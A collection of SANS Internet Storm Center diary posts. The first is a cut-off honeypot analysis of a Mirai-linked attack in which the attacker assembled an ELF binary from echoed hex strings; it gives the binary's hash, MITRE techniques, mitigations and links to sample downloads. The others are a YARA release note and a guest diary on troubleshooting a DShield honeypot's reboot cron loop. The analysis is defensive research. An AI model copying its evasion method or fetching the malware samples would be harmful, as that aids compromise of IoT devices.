Each one of the echo commands were copied and pasted into CyberChef, and a ‘recipe’ was used to decode the string from hexadecimal to binary, and then saved as an executable.

Why All of the Hexadecimal Numbers and Commands?

It is clear that the attacker wanted to evade being detected by assembling the malware binary executable from the victim device, rather than risk triggering anti-malware tools by downloading a malicious executable. When consulting the Mitre ATT&CK Framework, there are two key tactics used in this attack that are worth considering:

  • Tactic: Execution (TA0002)
    • Technique: Command and Scripting Interpreter: Unix Shell (T1059.004)
  • Tactic: Defense Evasion (TA0005)
    • Technique: Obfuscated Files or Information: Command Obfuscation (T1027.12)
       

What is It?

The assembled binary’s hash comes up on various databases as malicious, and categorized as a ‘Trojan.Mirai / miraidownloader’ [6], with several entries from community members attributing it to Mirai malware. Not much is known about this Linux elf executable. Many databases list it as a low threat score of 3/10. However, just because the score is low does not mean this binary is safe. More information about the malware sample can be found on Recorded Future’s Triage webpage [7]


How Can Mitigate Against This Kind of Attack?

Our honeypot emulates a poorly defended device on the open Internet. This particular attack scans for open SSH ports attached to devices with weak administrative credentials. Since Mirai based malware targets IoT devices, one of the simplest forms of defense is to change the default password of the IoT device to an unused complex long password (16 characters would be fine). Routers and Apache servers that are targets, should be patched according to the guidance on the CVEs. By not exposing IoT devices unnecessarily to the Internet, we can avoid compromise as well.

Samples of the malware can be downloaded on Virus Total and the Recorded Future[7] websites within the citations below.

[1] What is a Botnet?: https://www.akamai.com/glossary/what-is-a-botnet
[2] What is Mirai?: https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] TP-Link WAN-Side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
[4] Akamai SIRT Security Advisory: CVE-2023-26801 Exploited to spread Mirai Botnet Malware: https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
[5] Mirai Variant IZ1H9 Exploits: 13 Shocking New Attacks: https://impulsec.com/cybersecurity-news/mirai-variant-iz1h9-exploits/
[6] Virus Total: https://www.virustotal.com/gui/file/b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
[7] Recorded Future Triage: https://tria.ge/230526-dk1rrsde63
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA 4.5.0 Release, (Sun, Feb 18th)

This post was originally published on this site

YARA 4.4.0 was released, including the announced LNK module.

But the same day, YARA 4.5.0 was released without LNK support. It looks like the LNK module will only be released with the new YARA rewrite in Rust.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[Guest Diary] Learning by doing: Iterative adventures in troubleshooting, (Thu, Feb 15th)

This post was originally published on this site

[This is a Guest Diary by Preston Fitzgerald, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

A DShield honeypot [2] running on a raspberry Pi can sometimes be a bit of a fickle thing. While some may enjoy a ‘set it and forget it’ experience, I’ve found that my device sometimes requires a bit of babysitting. The latest example of this popped up when I connected to the device to inspect logs last week. What began as curiosity about failed log parsing led to learning about the DShield updater.

Background

The honeypot collects various potentially interesting artifacts for analysis. One source of this data is the webhoneypot.json file /srv/db/webhoneypot.json. Using jq, we can quickly parse this JSON for information about what remote hosts we’ve seen or what user agents they presented when they made requests to the honeypot:

jq '.headers | .host' webhoneypot.json | sort | uniq > ~/ops/hosts-DD-MM
jq .useragent webhoneypot.json | sort | uniq > ~/ops/agents-DD-MM

Part of the experience of monitoring a system like this is finding what feels good to you and what practices help you produce results. Some handlers will work to implement automation to identify interesting artifacts. Some will hunt and peck around until something catches their eye. One thing I’ve found works for me is periodically dumping information like this to file.

Roadblock ahead

What happened last week? My trusty tool jq returned a cry for help:

parse error: Invalid numeric literal at line 1, column 25165826

honeypot.json is malformed in some way. To make matters worse, the Pi was periodically crashing. It’s difficult to get any meaningful work done when your SSH sessions have a lifespan of 2 minutes. I decided to pull the card so I could inspect it directly, removing the Pi itself from the equation.

I plugged my card reader into a lab machine and instructed VMware to assign ownership of the device to a Slingshot[3] VM. 


Figure 1: VMware Workstation can treat a device connected physically to the host as if it were connected directly to the guest Virtual Machine. This feature is accessible in the VM -> Removable Devices menu. This card reader is labeled Super Top Mass Storage Device

With the Pi’s storage now mounted to the VM, it’s possible to navigate to the offending file and inspect it.


Figure 2: Screenshot showing the mounted file system 'rootfs' and the contents of /srv/db including webhoneypot.json

Notably, this file occupies nearly half a gigabyte of the card’s limited storage space. That’s a big text file! 

To the toolbox

Where did jq encounter its parsing error again?

parse error: Invalid numeric literal at line 1, column 25165826

It doesn’t like the 25,165,826th character (out of over 450 million total characters). How do we find out what’s in that position? What tools can we use? Another interesting quality of the file is that it consists of one single line. Go-to tools like head and tail are rendered less useful due to the single-line format. Though the file size is within vim’s documented maximum, I found that it struggled to open this file in my virtualized environment.

Thankfully awk’s substring feature will allow us to pluck out just the part of the file we are interested in working with.


Figure 3: Screenshot showing awk’s substring feature. Syntax: substr(string, starting index, length) here we are starting on character 25165820 and grabbing the following 20 characters.

 

We can begin to see what’s going wrong here by manipulating the starting index and length of the substring and comparing it to prettified JSON that jq is able to output from an earlier entry before it encounters its parsing error:


Figure 4: Screenshot showing expanded substring to get more context before and after the parsing error


Figure 5: Screenshot showing sample JSON structure from part of the document before the parsing error. Here we can see the end of the user agent string underlined in yellow, and the e": 72 part underlined in pink. Comparing the output of awk to the JSON structure we can see just how much information is missing between the two.

 

The JSON structure has been destroyed because the text is truncated between the user agent and part of the signature_id object. Unfortunately, patching up the structure here and re-running jq revealed that there are many such holes in the data. It didn’t take more than a couple of these mending and jq processing cycles to realize that it was futile to try sewing it all back together.

Pivot

So far, we’ve discovered that we have one very large, corrupted log file. It is too damaged to try to piece back together manually and the structure is too damaged to parse it as JSON. How can we salvage the useful artifacts within?

Let’s forget for a moment that this is meant to be JSON and treat it as any other text. By default, grep will return every line that matches the expression. We can use the -o option to return only the matched part of the data. This is useful because otherwise it would return the entire file on any match.

Return user agents:


Figure 6: Screenshot showing grep output matching the user-agent field in webhoneypot.json

Return hosts:


Figure 7: Screenshot showing grep output matching the IP addresses and ports in webhoneypot.json

There are almost always options and many pathways that lead to success. By reaching for another tool, we can get the information we were looking for.

So what about the Pi?

Let’s quantify my observation that the device was crashing often. Just how often did this happen? I started by copying /var/log/messages from the card over to my local disk. 

How much data are we working with? Let’s get a line count:

wc -l messages

This returned over 450,000 messages. That’s good news, we have some information to inspect. How many of those are startup messages?

grep -i booting messages | wc -l

1,371 matches for boot messages. After checking the start and end date of the log, that’s roughly 200 reboots a day on average. Let’s see if syslog has additional details for us. After searching for messages related to initial startup and grabbing lines that appear before those messages, I was able to spot something. The log contains many mentions of reboot

grep -i /sbin/reboot syslog

 


Figure 8: Screenshot showing a sample of the grep results for references to /sbin/reboot in syslog

 

How surprising! The Pi wasn’t crashing, it was being rebooted intentionally by a cron job. I copied the DShield cron located in /etc/cron.d/dshield and took a look at its contents.

grep -i /sbin/reboot dshield

 


Figure 9: A screenshot showing a number of cron jobs that trigger a reboot

Correction, it’s not a cron job—it’s several. Something has created 216 cron entries to reboot the Pi (this number is familiar, remember our ~200 reboots per day observation from the logs?). What could have made these entries? Let’s search the entire filesystem of the Pi for references to /sbin/reboot

grep -r ?/sbin/reboot? .

 


Figure 10: A screenshot showing the line in install.sh that appends reboot commands to /etc/cron.d/dshield.

The DShield installer itself creates these entries. I have version 93 which appears to be one version behind the current installer available on GitHub. The installer works by picking random time offsets. Because the firewall log parser uploads the sensor data before rebooting, the intent here is to spread the load so there isn’t a large spike of incoming sensor data at any one time throughout the day. So why would install.sh be running multiple times? You only run it once when you first install the sensor.

The answer is automatic updates. When you initially configure DShield you can enable automatic updates. The update script checks your current version and compares it to the latest version available on GitHub. Remember that my installed version was one behind current.


Figure 11: The updater compares the current DShield version to the latest available. If it sees that we are behind, it checks out the main branch of the repository and performs git pull to download the latest code before running the installer.

 

Inspecting /srv/log for install logs, it’s clear that the installer is running hundreds of times per day. 

 


Figure 12: A screenshot showing a directory listing of /srv/log where we see timestamped logs indicating the installer was running many times per day.

 

So what happened?

Knowing for certain which problem happened first will require further log review, but my current hypothesis is this: At some point, the updater started the installer. The installer created a cron job to kick off a reboot but the random time set for the task happened to be very near the current time. The installer was unable to finish its work before the Pi shut itself down. This is supported by the fact that some of the install logs I reviewed seem to end abruptly before the final messages are printed out.

There are several errors found throughout these logs, including missing certificates, failed package update steps, locked log files, and ‘expected programs not found in PATH’. I believe some combination of these problems caused the installer to fail each time it was ran by the updater, resulting in a loop.

Remediation

Re-imaging the Pi will be the simplest way to get us out of this situation, but how could the problem be remediated in the long run?

Regardless of the initial cause of this problem, one potential fix for the issue of redundant cron jobs is this:

Before appending the cron job with the reboot and upload tasks, the installer could delete /etc/cron.d/dshield. It appears this file only has three unique entries: 

 


Figure 13: A screenshot showing the four unique cron jobs used by DShield. We only need these entries, and not the hundreds of redundant lines.

 

By deleting the file and creating each of these jobs fresh when the installer runs, we can eliminate the risk of creating an 864-line cron configuration file.

It may also be advantageous to move this part of the installer script to the end of the process to eliminate the risk of the reboot firing before the script completes.

Most computer-inclined folks like their processes, their patterns, their Standard Operating Procedures. It’s important that we remain curious and nimble. Sometimes discovering something interesting or useful is the direct result of asking ourselves ‘why’ when something doesn’t seem right. Having the option to throw away a VM or revert it to snapshot is great. Throwing away a docker container that isn’t working the way we expect is convenient. Re-imaging a Pi to get it back to a known-good state helps us jump right back into our work. However, there can be real educational benefit when we slow down and perform troubleshooting on these things we generally view as ephemeral and when we share what we have learned, this can lead to improvements from which we all benefit.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] DShield: https://github.com/DShield-ISC/dshield
[3] Slingshot Linux: https://www.sans.org/tools/slingshot/

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.